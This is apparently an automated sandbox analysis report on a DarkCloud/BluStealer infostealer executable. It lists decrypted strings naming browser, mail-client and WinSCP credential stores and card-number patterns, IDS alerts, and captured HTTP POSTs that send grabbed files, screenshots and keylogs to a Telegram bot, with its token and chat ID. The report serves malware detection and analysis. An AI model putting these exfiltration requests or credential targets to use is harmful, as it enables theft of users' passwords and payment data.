Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Cookies
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Password
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Default\Login Data
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Login Data
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Password :
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: SMTP Email Address
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: NNTP Email Address
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Email
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: HTTPMail User Name
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: HTTPMail Server
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^389[0-9]{11}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^3[47][0-9]{13}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(6541\|6556)[0-9]{12}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^3(?:0[0-5]\|[68][0-9])[0-9]{11}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^63[7-9][0-9]{13}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(?:2131\|1800\|35\\d{3})\\d{11}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^9[0-9]{15}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(6304\|6706\|6709\|6771)[0-9]{12,15}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(5018\|5020\|5038\|6304\|6759\|6761\|6763)[0-9]{8,15}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Foxmail.exe
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Mastercard
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(6334\|6767)[0-9]{12}\|(6334\|6767)[0-9]{14}\|(6334\|6767)[0-9]{15}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{12}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{14}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{15}\|564182[0-9]{10}\|564182[0-9]{12}\|564182[0-9]{13}\|633110[0-9]{10}\|633110[0-9]{12}\|633110[0-9]{13}$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(62[0-9]{14,17})$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Visa Card
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?\|5[1-5][0-9]{14})$
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Visa Master Card
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \logins.json
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \signons.sqlite
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: mail\
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \AccCfg\Accounts.tdat
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: EnableSignature
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Application : FoxMail
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: logins
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: Select * from Win32_ComputerSystem
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Cookies
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \Default\Cookies
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \cookies.sqlite
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \cookies.db
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: \global-messages-db.sqlite
Source: 0.2.yMvZXcwN2OdoP6x.exe.37b0e88.5.raw.unpack	String decryptor: C:\\MailMasterData

Source: yMvZXcwN2OdoP6x.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49848 version: TLS 1.2

Source: yMvZXcwN2OdoP6x.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: W.pdb4 source: yMvZXcwN2OdoP6x.exe, 00000000.00000002.2103476200.0000000003767000.00000004.00000800.00020000.00000000.sdmp, yMvZXcwN2OdoP6x.exe, 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmp, LjlEiSlJe.exe, 0000000B.00000002.2163631105.0000000003947000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Code function: 4x nop then push ebx

9_2_0042EA80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49761 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49758 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044741 - Severity 1 - ET MALWARE DarkCloud Stealer File Grabber Function Exfiltrating Data via Telegram : 192.168.2.5:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044741 - Severity 1 - ET MALWARE DarkCloud Stealer File Grabber Function Exfiltrating Data via Telegram : 192.168.2.5:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49773 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49774 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49773 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49774 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49804 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49802 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49817 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49816 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49817 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49816 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49834 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49836 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49850 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49848 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49861 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49850 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49848 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49864 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49884 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49875 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49875 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49889 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49900 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49903 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49900 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49909 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49903 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49913 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49879 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49879 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49927 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49927 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49925 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49925 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49935 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49938 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49949 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49953 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49953 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49949 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49962 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 162.55.60.2 162.55.60.2

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: showip.net

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 162.55.60.2:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 162.55.60.2:80

Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 13917Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 13917Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 5155Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3571Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2548Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 2482Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 1525Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 1525Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1Accept: /Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 3932422Connection: Keep-AliveCache-Control: no-cache
